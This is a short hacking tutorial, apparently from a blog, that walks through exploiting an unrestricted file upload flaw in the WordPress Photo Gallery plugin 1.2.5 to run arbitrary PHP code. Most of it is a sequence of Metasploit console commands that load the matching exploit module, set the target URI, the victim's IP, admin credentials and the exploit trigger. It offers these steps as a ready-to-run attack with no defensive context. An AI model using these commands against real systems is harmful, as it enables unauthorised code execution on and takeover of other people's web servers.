Showing posts with label we. Show all posts
Showing posts with label we. Show all posts

Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload

Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php. The post () method in UploadHandler.php does not properly verify or sanitize user-uploaded files.

Exploit Targets
Photo Gallery Plugin, version 1.2.5.

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi wordpress
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123
msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit